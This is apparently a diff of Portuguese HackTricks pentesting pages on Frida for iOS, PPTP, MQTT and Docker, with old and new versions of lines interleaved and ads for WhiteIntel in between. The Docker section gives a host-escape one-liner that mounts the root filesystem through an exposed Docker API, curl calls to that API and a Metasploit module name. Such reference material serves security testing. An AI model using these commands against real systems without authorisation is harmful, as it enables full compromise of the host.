Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Instalando o Frida
**Passos para instalar o Frida em um dispositivo com Jailbreak:**
@ -26,7 +40,7 @@ Outras maneiras de apoiar o HackTricks:
Se você estiver usando **Corellium**, precisará baixar o lançamento do Frida em [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[sua versão]-ios-universal.dylib.gz`) e descompactar e copiar para a localização dylib que o Frida solicita, por exemplo: `/Users/[seu usuário]/.cache/frida/gadget-ios.dylib`
Após instalado, você pode usar o comando **`frida-ls-devices`** em seu PC e verificar se o dispositivo aparece (seu PC precisa ser capaz de acessá-lo).\
Após instalado, você pode usar em seu PC o comando **`frida-ls-devices`** e verificar se o dispositivo aparece (seu PC precisa ser capaz de acessá-lo).\
Execute também **`frida-ps -Uia`** para verificar os processos em execução no telefone.
## Frida sem dispositivo com Jailbreak e sem patchear o aplicativo
@ -67,7 +81,7 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
* Autocompletar: Basta executar `frida -U <programa>`
<figure><img src="../../.gitbook/assets/image (687).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
* Obter **todas** as **classes** disponíveis (filtrar por string)
@ -149,11 +163,11 @@ wg_log(arg0, arg1, txt);
console.log("loaded");
```
## Frida Fuzzing
## Fuzzing com Frida
### Frida Stalker
[A partir da documentação](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Stalker é o **motor de rastreamento** de código do Frida. Ele permite que threads sejam **seguidas**, **capturando** cada função, **cada bloco**, até mesmo cada instrução que é executada.
[A partir da documentação](https://frida.re/docs/stalker/): Stalker é o **motor de rastreamento** de código do Frida. Ele permite que threads sejam **seguidas**, **capturando** cada função, **cada bloco**, até mesmo cada instrução que é executada.
Você tem um exemplo implementando o Frida Stalker em [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
@ -196,7 +210,7 @@ Isso é interessante para fins de depuração, mas para fuzzing, estar constante
## [Fpicker](https://github.com/ttdennis/fpicker)
[**fpicker**](https://github.com/ttdennis/fpicker) é uma **suíte de fuzzing baseada em Frida** que oferece uma variedade de modos de fuzzing para fuzzing em processo, como um modo AFL++ ou um modo de rastreamento passivo. Deve ser executado em todas as plataformas suportadas pelo Frida.
[**fpicker**](https://github.com/ttdennis/fpicker) é uma **suite de fuzzing baseada em Frida** que oferece uma variedade de modos de fuzzing para fuzzing em processo, como um modo AFL++ ou um modo de rastreamento passivo. Deve ser executado em todas as plataformas suportadas pelo Frida.
* [**Instalar fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa**
```bash
@ -336,17 +350,17 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
Podes verificar os crashes em:
Podes verificar os crashes em:
- **iOS**
- Settings → Privacy → Analytics & Improvements → Analytics Data
- `/private/var/mobile/Library/Logs/CrashReporter/`
- Definições → Privacidade → Análise e Melhorias → Dados de Análise
- `/private/var/mobile/Library/Logs/CrashReporter/`
- **macOS**:
- `/Library/Logs/DiagnosticReports/`
- `~/Library/Logs/DiagnosticReports`
- `/Library/Logs/DiagnosticReports/`
- `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS armazena apenas 25 crashes do mesmo aplicativo, então é necessário limpar isso ou o iOS deixará de criar crashes.
O iOS armazena apenas 25 crashes da mesma aplicação, por isso é necessário limpar isso ou o iOS deixará de criar crashes.
{% endhint %}
## Tutoriais Frida Android
@ -356,18 +370,33 @@ iOS armazena apenas 25 crashes do mesmo aplicativo, então é necessário limpar
{% endcontent-ref %}
## Referências
- [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um motor de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares stealers**.
O objetivo principal do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares que roubam informações.
Podes verificar o site deles e experimentar o motor de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprende hacking AWS de zero a herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
- Se quiser ver a sua **empresa anunciada no HackTricks** ou **descarregar o HackTricks em PDF** Verifique os [**PLANOS DE SUBSCRIÇÃO**](https://github.com/sponsors/carlospolop)!
- Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), a nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partilhe os seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- Se quiseres ver a tua **empresa anunciada no HackTricks** ou **descarregar o HackTricks em PDF** verifica os [**PLANOS DE SUBSCRIÇÃO**](https://github.com/sponsors/carlospolop)!
- Obtém a [**merchandising oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Descobre [**A Família PEASS**](https://opensea.io/collection/the-peass-family), a nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junta-te ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **segue-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Partilha os teus truques de hacking submetendo PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

24
network-services-pentesting/1723-pentesting-pptp.md
View file

@ -6,7 +6,7 @@
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -14,9 +14,23 @@ Outras maneiras de apoiar o HackTricks:
</details>
## Informação Básica
## WhiteIntel
**Protocolo de Tunelamento Ponto a Ponto (PPTP)** é um método amplamente utilizado para **acesso remoto** a dispositivos móveis. Ele utiliza a **porta TCP 1723** para a troca de chaves, enquanto o **protocolo IP 47** (Encapsulamento de Roteamento Genérico, ou **GRE**), é usado para criptografar os dados transmitidos entre pares. Essa configuração é crucial para estabelecer um canal de comunicação seguro pela internet, garantindo que os dados trocados permaneçam confidenciais e protegidos contra acesso não autorizado.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
O **Protocolo de Tunelamento Ponto a Ponto (PPTP)** é um método amplamente utilizado para **acesso remoto** a dispositivos móveis. Ele utiliza a **porta TCP 1723** para a troca de chaves, enquanto o **protocolo IP 47** (Encapsulamento de Roteamento Genérico, ou **GRE**), é usado para criptografar os dados transmitidos entre pares. Essa configuração é crucial para estabelecer um canal de comunicação seguro pela internet, garantindo que os dados trocados permaneçam confidenciais e protegidos contra acesso não autorizado.
**Porta Padrão**: 1723
@ -24,7 +38,7 @@ Outras maneiras de apoiar o HackTricks:
```bash
nmap Pn -sSV -p1723 <IP>
```
### [Ataque de Força Bruta](../generic-methodologies-and-resources/brute-force.md#pptp)
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp)
## Vulnerabilidades
* [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/)
@ -40,6 +54,6 @@ Outras formas de apoiar o HackTricks:
* Adquira o [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

50
network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View file

@ -14,9 +14,23 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo de busca de forma **gratuita** em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
**MQ Telemetry Transport (MQTT)** é conhecido como um **protocolo de mensagens de publicação/assinatura** que se destaca por sua extrema simplicidade e leveza. Este protocolo é especificamente projetado para ambientes onde os dispositivos têm capacidades limitadas e operam em redes caracterizadas por baixa largura de banda, alta latência ou conexões não confiáveis. Os objetivos principais do MQTT incluem minimizar o uso da largura de banda da rede e reduzir a demanda nos recursos do dispositivo. Além disso, ele visa manter uma comunicação confiável e fornecer um certo nível de garantia de entrega. Esses objetivos tornam o MQTT excepcionalmente adequado para o campo em crescimento da **comunicação máquina a máquina (M2M)** e a **Internet das Coisas (IoT)**, onde é essencial conectar uma infinidade de dispositivos de forma eficiente. Além disso, o MQTT é altamente benéfico para aplicativos móveis, onde a conservação de largura de banda e vida útil da bateria são cruciais.
**MQ Telemetry Transport (MQTT)** é conhecido como um protocolo de mensagens **publish/subscribe** que se destaca por sua extrema simplicidade e leveza. Este protocolo é especificamente projetado para ambientes onde os dispositivos têm capacidades limitadas e operam em redes caracterizadas por baixa largura de banda, alta latência ou conexões não confiáveis. Os objetivos principais do MQTT incluem minimizar o uso da largura de banda da rede e reduzir a demanda nos recursos do dispositivo. Além disso, ele visa manter uma comunicação confiável e fornecer um certo nível de garantia de entrega. Esses objetivos tornam o MQTT excepcionalmente adequado para o campo em crescimento da **comunicação máquina a máquina (M2M)** e a **Internet das Coisas (IoT)**, onde é essencial conectar uma infinidade de dispositivos de forma eficiente. Além disso, o MQTT é altamente benéfico para aplicativos móveis, onde a conservação de largura de banda e vida útil da bateria são cruciais.
**Porta padrão:** 1883
```
@ -25,9 +39,9 @@ PORT STATE SERVICE REASON
```
## Inspeção do tráfego
Quando um pacote **CONNECT** é recebido pelos brokers MQTT, um pacote **CONNACK** é enviado de volta. Este pacote contém um código de retorno que é crucial para entender o status da conexão. Um código de retorno de **0x00** significa que as credenciais foram aceitas, indicando uma conexão bem-sucedida. Por outro lado, um código de retorno de **0x05** sinaliza que as credenciais são inválidas, impedindo assim a conexão.
Quando um pacote **CONNECT** é recebido pelos corretores MQTT, um pacote **CONNACK** é enviado de volta. Este pacote contém um código de retorno que é crucial para entender o status da conexão. Um código de retorno de **0x00** significa que as credenciais foram aceitas, indicando uma conexão bem-sucedida. Por outro lado, um código de retorno de **0x05** sinaliza que as credenciais são inválidas, impedindo assim a conexão.
Por exemplo, se o broker rejeitar a conexão devido a credenciais inválidas, o cenário seria semelhante a isto:
Por exemplo, se o corretor rejeitar a conexão devido a credenciais inválidas, o cenário seria algo assim:
```
{
"returnCode": "0x05",
@ -94,7 +108,7 @@ O modelo de publicar/assinar é composto por:
- **Editor**: publica uma mensagem em um (ou vários) tópico(s) no broker.
- **Assinante**: se inscreve em um (ou vários) tópico(s) no broker e recebe todas as mensagens enviadas pelo editor.
- **Broker**: roteia todas as mensagens dos editores para os assinantes.
- **Tópico**: consiste em um ou mais níveis separados por uma barra inclinada (por exemplo, /casainteligente/sala/temperatura).
- **Tópico**: consiste em um ou mais níveis separados por uma barra inclinada (por exemplo, /smartshouse/livingroom/temperature).
### Formato do Pacote <a href="#f15a" id="f15a"></a>
@ -102,21 +116,21 @@ Cada pacote MQTT contém um cabeçalho fixo (Figura 02).Figura 02: Cabeçalho Fi
![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png)
### Tipos de Pacote
### Tipos de Pacotes
- CONNECT (1): Iniciado pelo cliente para solicitar uma conexão com o servidor.
- CONNACK (2): Confirmação do servidor de uma conexão bem-sucedida.
- PUBLISH (3): Usado para enviar uma mensagem do cliente para o servidor ou vice-versa.
- PUBACK (4): Confirmação de um pacote PUBLISH.
- PUBREC (5): Parte de um protocolo de entrega de mensagem garantindo que a mensagem seja recebida.
- PUBREL (6): Garantia adicional na entrega da mensagem, indicando uma liberação de mensagem.
- PUBREC (5): Parte de um protocolo de entrega de mensagem que garante que a mensagem seja recebida.
- PUBREL (6): Garantia adicional na entrega da mensagem, indicando uma liberação da mensagem.
- PUBCOMP (7): Parte final do protocolo de entrega de mensagem, indicando conclusão.
- SUBSCRIBE (8): Solicitação de um cliente para ouvir mensagens de um tópico.
- SUBACK (9): Confirmação do servidor de uma solicitação de SUBSCRIBE.
- UNSUBSCRIBE (10): Solicitação de um cliente para parar de receber mensagens de um tópico.
- UNSUBACK (11): Resposta do servidor a uma solicitação de UNSUBSCRIBE.
- PINGREQ (12): Uma mensagem de batimento cardíaco enviada pelo cliente.
- PINGRESP (13): Resposta do servidor à mensagem de batimento cardíaco.
- PINGREQ (12): Uma mensagem de pulso enviada pelo cliente.
- PINGRESP (13): Resposta do servidor à mensagem de pulso.
- DISCONNECT (14): Iniciado pelo cliente para encerrar a conexão.
- Dois valores, 0 e 15, são marcados como reservados e seu uso é proibido.
@ -124,14 +138,26 @@ Cada pacote MQTT contém um cabeçalho fixo (Figura 02).Figura 02: Cabeçalho Fi
- `port:1883 MQTT`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
- Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Obtenha [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

133
network-services-pentesting/2375-pentesting-docker.md
View file

@ -1,32 +1,48 @@
# 2375, 2376 Pentesting Docker
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## Conceitos Básicos do Docker
## WhiteIntel
### O que é
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
O Docker é a **plataforma líder** na **indústria de containerização**, liderando a **inovação contínua**. Facilita a criação e distribuição sem esforço de aplicativos, abrangendo desde os **tradicionais até os futuristas**, e garante sua **implantação segura** em diversos ambientes.
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
### Arquitetura básica do Docker
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
- **[containerd](http://containerd.io)**: Este é um **tempo de execução central** para contêineres, encarregado da **gestão abrangente do ciclo de vida de um contêiner**. Isso envolve lidar com a **transferência e armazenamento de imagens**, além de supervisionar a **execução, monitoramento e rede** de contêineres. **Mais insights detalhados** sobre o containerd são **explorados ainda mais**.
- O **container-shim** desempenha um papel crítico como um **intermediário** no manuseio de **contêineres sem interface gráfica**, assumindo perfeitamente o controle do **runc** após a inicialização dos contêineres.
- **[runc](http://runc.io)**: Estimado por suas capacidades de **tempo de execução de contêiner leve e universal**, o runc está alinhado com o **padrão OCI**. É usado pelo containerd para **iniciar e gerenciar contêineres** de acordo com as **diretrizes OCI**, tendo evoluído do **libcontainer** original.
- **[grpc](http://www.grpc.io)** é essencial para **facilitar a comunicação** entre o containerd e o **docker-engine**, garantindo uma **interação eficiente**.
- O **[OCI](https://www.opencontainers.org)** é fundamental para manter as **especificações OCI** para tempo de execução e imagens, sendo as versões mais recentes do Docker **compatíveis com os padrões de imagem e tempo de execução OCI**.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
### Comandos básicos
{% embed url="https://whiteintel.io" %}
---
### Conceitos Básicos do Docker
#### O que é
O Docker é a **plataforma líder** na indústria de **containerização**, liderando a **inovação contínua**. Facilita a criação e distribuição sem esforço de aplicativos, abrangendo desde os **tradicionais até os futuristas**, e garante a **implantação segura** deles em diversos ambientes.
#### Arquitetura básica do Docker
* [**containerd**](http://containerd.io): Este é um **tempo de execução central** para contêineres, encarregado da **gestão abrangente do ciclo de vida de um contêiner**. Isso envolve lidar com a **transferência e armazenamento de imagens**, além de supervisionar a **execução, monitoramento e rede** de contêineres. **Insights mais detalhados** sobre o containerd são **explorados ainda mais**.
* O **container-shim** desempenha um papel crítico como um **intermediário** no manuseio de **contêineres sem interface gráfica**, assumindo perfeitamente o controle do **runc** após a inicialização dos contêineres.
* [**runc**](http://runc.io): Estimado por suas capacidades de **tempo de execução de contêiner leve e universal**, o runc está alinhado com o **padrão OCI**. É usado pelo containerd para **iniciar e gerenciar contêineres** de acordo com as **diretrizes OCI**, tendo evoluído do **libcontainer** original.
* [**grpc**](http://www.grpc.io) é essencial para **facilitar a comunicação** entre o containerd e o **docker-engine**, garantindo uma **interação eficiente**.
* O [**OCI**](https://www.opencontainers.org) é fundamental para manter as **especificações OCI** para tempo de execução e imagens, sendo as versões mais recentes do Docker **compatíveis com os padrões de imagem e tempo de execução** OCI.
#### Comandos básicos
```bash
docker version #Get version of docker client, API, engine, containerd, runc, docker-init
docker info #Get more infomarion about docker settings
@ -49,11 +65,11 @@ docker system prune -a
# - all images without at least one container associated to them
# - all build cache
```
### Containerd
#### Containerd
**Containerd** foi desenvolvido especificamente para atender às necessidades de plataformas de contêineres como **Docker e Kubernetes**, entre outras. Seu objetivo é **simplificar a execução de contêineres** em vários sistemas operacionais, incluindo Linux, Windows, Solaris e outros, abstraindo funcionalidades específicas do sistema operacional e chamadas de sistema. O objetivo do Containerd é incluir apenas os recursos essenciais necessários para seus usuários, buscando omitir componentes desnecessários. No entanto, alcançar completamente esse objetivo é reconhecido como desafiador.
**Containerd** foi desenvolvido especificamente para atender às necessidades de plataformas de contêineres como **Docker e Kubernetes**, entre outras. Seu objetivo é **simplificar a execução de contêineres** em vários sistemas operacionais, incluindo Linux, Windows, Solaris e outros, abstraindo funcionalidades específicas do sistema operacional e chamadas de sistema. O objetivo do Containerd é incluir apenas os recursos essenciais necessários pelos usuários, buscando omitir componentes desnecessários. No entanto, reconhece-se que alcançar esse objetivo completamente é desafiador.
Uma decisão de design chave é que **Containerd não lida com redes**. A rede é considerada um elemento crítico em sistemas distribuídos, com complexidades como Redes Definidas por Software (SDN) e descoberta de serviços que variam significativamente de uma plataforma para outra. Portanto, o Containerd deixa os aspectos de rede para serem gerenciados pelas plataformas que ele suporta.
Uma decisão de design chave é que **Containerd não lida com a rede**. A rede é considerada um elemento crítico em sistemas distribuídos, com complexidades como Redes Definidas por Software (SDN) e descoberta de serviços que variam significativamente de uma plataforma para outra. Portanto, o Containerd deixa os aspectos de rede para serem gerenciados pelas plataformas que ele suporta.
Enquanto o **Docker utiliza o Containerd** para executar contêineres, é importante observar que o Containerd suporta apenas um subconjunto das funcionalidades do Docker. Especificamente, o Containerd não possui as capacidades de gerenciamento de rede presentes no Docker e não suporta a criação de enxames do Docker diretamente. Essa distinção destaca o papel focado do Containerd como um ambiente de tempo de execução de contêiner, delegando funcionalidades mais especializadas para as plataformas com as quais se integra.
```bash
@ -71,24 +87,22 @@ ctr tasks resume <containerName> #Resume cotainer
ctr task kill -s SIGKILL <containerName> #Stop running container
ctr container delete <containerName>
```
### Podman
#### Podman
**Podman** é um mecanismo de contêiner de código aberto que adere aos padrões da [Open Container Initiative (OCI)](https://github.com/opencontainers), desenvolvido e mantido pela Red Hat. Ele se destaca do Docker com várias características distintas, especialmente sua **arquitetura sem daemon** e suporte para **contêineres sem raiz**, permitindo que os usuários executem contêineres sem privilégios de root.
**Podman** é um mecanismo de contêiner de código aberto que adere aos [padrões da Open Container Initiative (OCI)](https://github.com/opencontainers), desenvolvido e mantido pela Red Hat. Ele se destaca do Docker com várias características distintas, especialmente sua **arquitetura sem daemon** e suporte para **contêineres sem raiz**, permitindo que os usuários executem contêineres sem privilégios de root.
O Podman é projetado para ser compatível com a API do Docker, permitindo o uso de comandos da CLI do Docker. Essa compatibilidade se estende ao seu ecossistema, que inclui ferramentas como **Buildah** para construir imagens de contêiner e **Skopeo** para operações de imagem como push, pull e inspeção. Mais detalhes sobre essas ferramentas podem ser encontrados em sua [página do GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
**Diferenças Chave**
- **Arquitetura**: Ao contrário do modelo cliente-servidor do Docker com um daemon em segundo plano, o Podman opera sem um daemon. Esse design significa que os contêineres são executados com os privilégios do usuário que os inicia, aumentando a segurança ao eliminar a necessidade de acesso de root.
- **Integração com Systemd**: O Podman se integra ao **systemd** para gerenciar contêineres, permitindo o gerenciamento de contêineres por meio de unidades systemd. Isso contrasta com o uso do systemd pelo Docker principalmente para gerenciar o processo do daemon do Docker.
- **Contêineres sem Raiz**: Uma característica fundamental do Podman é sua capacidade de executar contêineres sob os privilégios do usuário iniciante. Essa abordagem minimiza os riscos associados a violações de contêiner, garantindo que os invasores obtenham apenas os privilégios do usuário comprometido, e não acesso de root.
* **Arquitetura**: Ao contrário do modelo cliente-servidor do Docker com um daemon em segundo plano, o Podman opera sem um daemon. Esse design significa que os contêineres são executados com os privilégios do usuário que os inicia, aprimorando a segurança ao eliminar a necessidade de acesso de root.
* **Integração com Systemd**: O Podman se integra ao **systemd** para gerenciar contêineres, permitindo o gerenciamento de contêineres por meio de unidades systemd. Isso contrasta com o uso do systemd pelo Docker principalmente para gerenciar o processo do daemon do Docker.
* **Contêineres sem Raiz**: Uma característica fundamental do Podman é sua capacidade de executar contêineres sob os privilégios do usuário iniciante. Essa abordagem minimiza os riscos associados a violações de contêiner, garantindo que os invasores obtenham apenas os privilégios do usuário comprometido, e não acesso de root.
A abordagem do Podman oferece uma alternativa segura e flexível ao Docker, enfatizando o gerenciamento de privilégios do usuário e a compatibilidade com os fluxos de trabalho existentes do Docker.
{% hint style="info" %}
Observe que, como o Podman visa suportar a mesma API que o Docker, você pode usar os mesmos comandos com o Podman como com o Docker, como:
Observe que, como o Podman visa suportar a mesma API que o Docker, você pode usar os mesmos comandos com o Podman como com o Docker, tais como:
```bash
podman --version
podman info
@ -97,18 +111,18 @@ podman ls
```
{% endhint %}
## Informação Básica
### Informação Básica
A API remota está em execução por padrão na porta 2375 quando habilitada. O serviço, por padrão, não exigirá autenticação, permitindo que um atacante inicie um contêiner Docker privilegiado. Ao usar a API remota, é possível anexar hosts/diretórios raiz ao contêiner e ler/escrever arquivos do ambiente do host.
A API Remota está em execução por padrão na porta 2375 quando habilitada. O serviço, por padrão, não exigirá autenticação, permitindo que um atacante inicie um contêiner Docker privilegiado. Ao usar a API Remota, é possível anexar hosts/(diretório raiz) ao contêiner e ler/escrever arquivos do ambiente do host.
**Porta padrão:** 2375
```
PORT STATE SERVICE
2375/tcp open docker
```
## Enumeração
### Enumeração
### Manual
#### Manual
Note que, para enumerar a API do docker, você pode usar o comando `docker` ou `curl` como no exemplo a seguir:
```bash
@ -149,14 +163,14 @@ GitCommit: fec3683
Se você pode **acessar a API remota do docker com o comando `docker`**, você pode **executar** qualquer um dos **comandos docker** [**comentados anteriormente**](2375-pentesting-docker.md#basic-commands) para interagir com o serviço.
{% hint style="info" %}
Você pode `export DOCKER_HOST="tcp://localhost:2375"` e **evitar** usar o parâmetro `-H` com o comando docker
Você pode `export DOCKER_HOST="tcp://localhost:2375"` e **evitar** o uso do parâmetro `-H` com o comando docker
{% endhint %}
#### Escalação rápida de privilégios
**Escalonamento rápido de privilégios**
```bash
docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
#### Curl
**Curl**
Às vezes você verá **2376** disponível para o endpoint **TLS**. Não consegui me conectar a ele com o cliente docker, mas é possível fazer isso com o curl.
```bash
@ -190,36 +204,36 @@ curl insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
```
Se deseja mais informações sobre isso, mais informações estão disponíveis de onde copiei os comandos: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
### Automático
#### Automático
```bash
msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>
```
## Comprometimento
### Comprometimento
Na página a seguir, você pode encontrar maneiras de **escapar de um contêiner docker**:
Na seguinte página você pode encontrar maneiras de **escapar de um container docker**:
{% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %}
[docker-security](../linux-hardening/privilege-escalation/docker-security/)
{% endcontent-ref %}
